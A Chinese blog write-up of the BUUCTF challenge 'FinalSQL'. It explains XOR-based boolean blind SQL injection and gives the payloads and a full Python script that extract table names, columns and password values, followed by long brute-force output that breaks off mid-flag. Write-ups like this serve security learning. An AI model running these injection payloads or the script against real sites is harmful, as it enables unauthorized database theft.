BUUCTF-[极客大挑战 2019]FinalSQL

最新推荐文章于 2025-04-24 19:06:01 发布
最新推荐文章于 2025-04-24 19:06:01 发布
阅读量617 收藏 1
点赞数 2
分类专栏: CTF刷题集合 文章标签: python 安全 web安全 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44016181/article/details/132911158
版权

[极客大挑战 2019]FinalSQL

原始信息

题目提示的信息很少,差不多:

首先是一个网站5个按钮,一个账户登录,分别是如下的url:
用户访问指定id的url
http://00a817db-1c3d-4e95-88a1-38b20e8960f8.node4.buuoj.cn:81/search.php?id=1
用户登录的url
http://00a817db-1c3d-4e95-88a1-38b20e8960f8.node4.buuoj.cn:81/check.php?username=1&password=1

# 测试了一番:
	1.无法使用堆叠注入(限制union)
	2.无法使用报错注入(非数据库原始报错信息)
	3.无法使用时间盲注(费时费力,下面测试的时候跑个flag都十分的费劲)
	4.直接在账密上使用布尔盲注容易出擦子,采用id上的注入
因为用户的登录框过滤的过于严密,暂时忽略,选择另外一个注点:/search.php?id=1

解题

解题前,先记下返回的值:

#下面全是针对search.php的:
id=1	NO! Not this! Click others~~~
id=2	yingyingying~ Not this as well~~
id=3	Ohhh You find the flag read on!
id=4	OK OK I will tell you,just in the next! really~~~~
id=5	
You are too naive!How can I give it to you? So,why not take a look at the sixth one?But where is it?
id=6	Clever! But not this table.
#从下面往后,全是报错:
id=7	ERROR!!!
id=0	ERROR!!!
id=-1	ERROR!!!

有一种特殊的报错,是Error! <br>,就目前观察来看,是符合当前注入的SQL查询错误。

再补充下异或得到的值:
1^0	1
1^1	0
1^2 3
1^3	2
1^4	5
1^5 4
1^6 7
1^7 6

一般来讲,1^true=0,1^false=1
这是异或注入的原理
也就是说,我们经常使用到的是:
1^(true)=0		ERROR!!!
1^(false)=1		NO! Not this! Click others~~~
这俩数据,是我们进行爆破的核心关键所在。

根据上面的回显的字符串,我们尝试做下异或注入,也称作布尔注入,布尔盲注。

# 大括号的意思是包含了某个值,大括号的具体内容看下面脚本就行了
# 尝试测测库长度,直接测出来了
?id=1^(length(database())); 
-- 得到的值等价于4,说明数据库的名字是四位的

# 尝试爆库名
?id=1^(ascii(SUBSTRING(database(),1,1))=103);
-- 分别爆出的:103,101,101,107 => geek

# 尝试爆列爆表
# 爆表名长度
?id=1^((SELECT(length(GROUP_CONCAT(table_name)))FROM(information_schema.tables)where(table_schema=database()))=16)
-- 得到的是16

#爆破表名
#一个是上面获取的字符串长度轮换变化,一个是0到128的ascii码的十进制数字变化
?id=1^((SELECT(ascii(SUBSTRING(GROUP_CONCAT(table_name),{},1)))FROM(information_schema.tables)where(table_schema=database()))={})
-- 爆出来的是: F1naI1y,Flaaaaag

# 尝试根据Flaaaaag表名爆列值
?id=1^((SELECT(ord(SUBSTRING(GROUP_CONCAT(column_name),{},1)))FROM(information_schema.columns)where(table_name="Flaaaaag"))={});
-- 得到id,fl4gawsl
# 尝试爆列值
-- 这个爆列值就算了,就是个报错集中表,就是那些id=1到id=6的存放表
-- 暂时排除此处存在flag的情况

# 尝试爆破另外一个表F1naI1y
# 爆列名
?id=1^((SELECT(ord(SUBSTRING(GROUP_CONCAT(column_name),{},1)))FROM(information_schema.columns)where(table_name="F1naI1y"))={});
-- 爆出来的列是id,username,password
# 用户名爆不出东西,尝试爆破密码
?id=1^((select(ord(SUBSTRING(GROUP_CONCAT(password),{},1)))from(geek.F1naI1y))={});
-- 这爆破实在是久得离谱……
-- 用上了ascii码,并且排除了特殊字符,就那么慢慢爆破
-- 这个时候就能暂时放下手中的题目,先去做别的题了

下面是具体的脚本,想学咋整的可以仔细些看,核心函数也就那几个,大部分都是复用的:

# coding=utf-8
import requests,re,time
# 火狐浏览器UA
data = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
}

# 错误提示集--短集合
arr = ['NO!','yingyingying','Ohhh','OK OK I','You are','Clever!']

# 专门搞传输的模块
def get_url(url,data):
    req = requests.get(url, headers=data)
    html_content = req.text
    # 正则表达式
    pattern = r"<h1.*?>(.*?)</h1>"
    matches = re.findall(pattern, html_content)
    return matches

# ascii码的碰撞单元
def ascii_get(url,url_edit,num,s):
    stt = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz[\]^_`{|}~ !"#$%&'()*+,-./0123456789:;<=>?@"""
    for i in stt:
        time.sleep(0.1)
        urls = url + url_edit.format(num + 1, ord(i))
        matches = get_url(urls, data)
        # print(matches,num+1,i,urls)
        try:
            if matches == []:
                continue
            if 'ERROR' in matches[0]:
                s += i
                # print(s)
                break
            if '414 Request-URI Too Large' in matches[0]:
                # print(n, i, strs, urls)
                print(url)
        except:
            pass
    return s

def get_data_len(url,data,url_edit,n=1):
    urls = url+url_edit
    value = get_url(urls,data)
    if n==1:
        for i in arr:
            if i in value[0]:
                return arr.index(i)
        return value
    elif n==2:
        pass

def get_data_name(url,url_edit,n,data_name_input):
    urls = ''
    data_name = ''
    # 根据获取的数据库名字的长度输出数据库名字
    s = ''
    stt = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz[\]^_`{|}~ !"#$%&'()*+,-./0123456789:;<=>?@"""
    # for循环读取数据库库名
    for num in range(n):
        original = s
        s = ascii_get(url,url_edit,num,s)
        print('{}:'.format(data_name_input),s)
        if s == original:
            break
    return s

def get_flag(flag_str):
    regular_expression = '.*?flag{(.*?)}.*?'
    matches = re.findall(regular_expression, flag_str)[0]
    print('你需要的flag为:flag{'+matches+"}")

def url_edit(url):
    if url[-1] == '/':
        return url[:-1]
    return url

if __name__ == '__main__':
    url = input('请输入一个合法的url(不需要带参数,形如:http://xxx.xxx.xxx:81)\n不正确运行出错就是你自己的事情喽:\n')
    url = url_edit(url)

    # 获取当前数据库的名字的长度
    url_edit = '/search.php?id=1^(length(database()));'
    data_len = get_data_len(url,data,url_edit)
    print('数据库名字的长度:',data_len)
    if data_len == ['404']:
        print('你的靶场已关闭,状态码:404')
        exit()
    # 获取当前数据库名
    url_edit = '/search.php?id=1^(ord(SUBSTRING(database(),{},1))={});'
    data_name = get_data_name(url,url_edit,data_len,'数据库名')
    # 根据数据库爆表
    print('即将爆破出数据库'+data_name+'的表:')
    url_edit = '/search.php?id=1^((SELECT(ord(SUBSTRING(GROUP_CONCAT(table_name),{},1)))FROM(information_schema.tables)where(table_schema=database()))={});'
    table_name = get_data_name(url,url_edit,1000,'表名').split(',')
    # 爆列名
    print('即将爆破的表:',table_name[0])
    url_edit = '/search.php?id=1^((SELECT(ord(SUBSTRING(GROUP_CONCAT(column_name),{},1)))FROM(information_schema.columns)where(table_name="'+table_name[0]+'"))={});'
    column_name = get_data_name(url,url_edit,1000,'列名').split(',')

    # 爆值
    print('即将被爆破的列:',column_name[-1])
    table_names = data_name + '.' + table_name[0]
    url_edit = '/search.php?id=1^((select(ord(SUBSTRING(GROUP_CONCAT('+ column_name[-1] +'),{},1)))from('+table_names+'))={});'
    list_val = get_data_name(url,url_edit,1000,'列值')
    get_flag(list_val)

下面是爆破的结果,十分的长,耗时足足45分钟左右:

数据库名字的长度: 4
数据库名: g
数据库名: ge
数据库名: gee
数据库名: geek
即将爆破出数据库geek的表:
表名: F
表名: F1
表名: F1n
表名: F1na
表名: F1naI
表名: F1naI1
表名: F1naI1y
表名: F1naI1y,
表名: F1naI1y,F
表名: F1naI1y,Fl
表名: F1naI1y,Fla
表名: F1naI1y,Flaa
表名: F1naI1y,Flaaa
表名: F1naI1y,Flaaaa
表名: F1naI1y,Flaaaaa
表名: F1naI1y,Flaaaaag
表名: F1naI1y,Flaaaaag
即将爆破的表: F1naI1y
列名: i
列名: id
列名: id,
列名: id,u
列名: id,us
列名: id,use
列名: id,user
列名: id,usern
列名: id,userna
列名: id,usernam
列名: id,username
列名: id,username,
列名: id,username,p
列名: id,username,pa
列名: id,username,pas
列名: id,username,pass
列名: id,username,passw
列名: id,username,passwo
列名: id,username,passwor
列名: id,username,password
列名: id,username,password
即将被爆破的列: password
列值: c
列值: cl
列值: cl4
列值: cl4y
列值: cl4y_
列值: cl4y_i
列值: cl4y_is
列值: cl4y_is_
列值: cl4y_is_r
列值: cl4y_is_re
列值: cl4y_is_rea
列值: cl4y_is_real
列值: cl4y_is_reall
列值: cl4y_is_really
列值: cl4y_is_really_
列值: cl4y_is_really_a
列值: cl4y_is_really_am
列值: cl4y_is_really_ama
列值: cl4y_is_really_amaz
列值: cl4y_is_really_amazi
列值: cl4y_is_really_amazin
列值: cl4y_is_really_amazing
列值: cl4y_is_really_amazing,
列值: cl4y_is_really_amazing,w
列值: cl4y_is_really_amazing,we
列值: cl4y_is_really_amazing,wel
列值: cl4y_is_really_amazing,welc
列值: cl4y_is_really_amazing,welco
列值: cl4y_is_really_amazing,welcom
列值: cl4y_is_really_amazing,welcome
列值: cl4y_is_really_amazing,welcome_
列值: cl4y_is_really_amazing,welcome_t
列值: cl4y_is_really_amazing,welcome_to
列值: cl4y_is_really_amazing,welcome_to_
列值: cl4y_is_really_amazing,welcome_to_m
列值: cl4y_is_really_amazing,welcome_to_my
列值: cl4y_is_really_amazing,welcome_to_my_
列值: cl4y_is_really_amazing,welcome_to_my_b
列值: cl4y_is_really_amazing,welcome_to_my_bl
列值: cl4y_is_really_amazing,welcome_to_my_blo
列值: cl4y_is_really_amazing,welcome_to_my_blog
列值: cl4y_is_really_amazing,welcome_to_my_blog,
列值: cl4y_is_really_amazing,welcome_to_my_blog,h
列值: cl4y_is_really_amazing,welcome_to_my_blog,ht
列值: cl4y_is_really_amazing,welcome_to_my_blog,htt
列值: cl4y_is_really_amazing,welcome_to_my_blog,http
列值: cl4y_is_really_amazing,welcome_to_my_blog,http:
列值: cl4y_is_really_amazing,welcome_to_my_blog,http:/
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://w
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://ww
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.t
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.to
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,h
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,ht
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,htt
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http:
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http:/
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://w
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://ww
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.t
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.to
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,h
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,ht
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,htt
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http:
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http:/
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://w
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://ww
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.t
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.to
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,h
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,ht
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,htt
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http:
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http:/
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://w
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://ww
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.t
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.to
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,w
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,we
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,wel
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welc
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welco
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_t
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_S
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Sy
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syc
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Sycl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclo
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclov
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclove
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_r
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_re
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_rea
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_real
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_reall
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_n
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_ne
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_nee
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_g
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_gr
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_gri
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_gril
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilf
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfr
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfri
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfrie
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfrien
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,f
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,fl
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,fla
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{e
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ed
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc22
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc228
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c3
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c34
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340
